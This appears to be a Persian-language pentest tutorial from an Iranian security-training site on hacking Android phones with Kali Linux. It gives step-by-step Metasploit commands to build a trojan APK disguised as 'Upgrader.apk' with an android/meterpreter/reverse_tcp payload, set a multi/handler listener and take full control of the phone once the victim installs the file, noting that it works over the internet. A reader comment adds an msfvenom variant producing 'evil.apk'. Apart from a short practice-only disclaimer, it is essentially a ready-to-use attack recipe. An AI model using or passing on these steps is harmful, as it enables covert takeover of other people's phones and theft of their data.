اندروید را با کالی لینوکس هک کنید

به سری آموزش های تست نفوذ آکادمی امنیت اطلاعات ایران خوش آمدید. در این مقاله قصد تست نفوذ به دستگاه اندرویدی را داریم که در محیط کالی بوسیله متااسپلویت انجام می شود. پس آماده باشید تا اندروید را با کالی لینوکس هک کنید…
هدف از این آموزش تمرین تست نفوذ و آشنایی با راه های نفوذ در اندروید است، به هیچ وجه برای اهداف شخصی و دسترسی به گوشی انجام ندهید. پیشنهاد ما این است که برای امور تست نفوذ اندروید یک لابراتوار کوچک و کم هزینه برای خود تهیه کنید.
هشدار
مرحله اول
کالی را راه اندازی کنید
وارد کالی لینوکس خود شوید و ترمینال را باز کنید تا مراحل ساخت یک فایل Trojan .apk برای نفوذ را پیش ببریم.
دستور زیر را در ترمینال بنویسید:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
LHOST را آدرس IP خود یا سرور برای برقراری ارتباط وارد کنید. در صورت استفاده از آدرس IP خود باید قابلیت Port forwarding را فعال کنید.
این روش نفوذ در تمام تجهیزات اندرویدی در محیط شبکه اینترنت یعنی WAN هم قابل اجرا است. پس بنشینید و آماده باشید تا اندروید را با کالی لینوکس هک کنید.

مرحله دوم
ترمینال دیگری باز کنید
در حالی که صفحه ترمینال بالا باز است، ترمینال دیگری را باز کنید، و کنسول متااسپلویت را با دستور msfconsole اجرا کنید:

مرحله سوم
یک Listener برای دریافت اطلاعات تنطیم کنید
بعد از اینکه متااسپلویت لود شد دستور زیر را اجرا کنید
use exploit/multi/handler

در ادامه باید یک (reverse) payload تنظیم کنیم تا ارتباط بین هکر و قربانی برقرار شود، دستور زیر را تایپ کنید:
set payload android/meterpreter/reverse_tcp
برای تنظیم LHOST همان آدرسی که مرحله قبل تنظیم کردید و برای خودتان است را وارد کنید.
set LHOST 192.168.0.4

مرحله چهارم
اکسپلویت کنید
دستور exploit را تایپ کنید
سپس برای اینکه اندروید را با کالی لینوکس هک کنید باید فایل Upgrader.apk که برنامه متااسپلویت ساخته است را در تلفن اندروید خود اجرا کنید. این فایل در پوشه Root شما ساخته و ذخیره شده است.

نفوذ موفق
بعد از نصب و اجرا در سیستم اندروید میتوانید به وسیله کنسول متااسپلویت خود، کلیه کنترل اندروید را بدست بگیرید.

نکته: ممکن است این روش بر انواع مختلف اندروید های جدید که دارای برزورسانی و تقویت سیستم امنیتی و دارای برنامه امنیتی باشند بدرستی کار نکند.
اگر بیشتر در مورد متااسپلویت میخواهید بدانید، مقالات زیر را بخوانید:

1 دیدگاه
به گفتگوی ما بپیوندید و دیدگاه خود را با ما در میان بگذارید.
با سلام
اگر با این ارور مواجه میشید: command not found
این دستور رو بزنید:
/usr/bin/msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) -f rb -o /root/evil.apk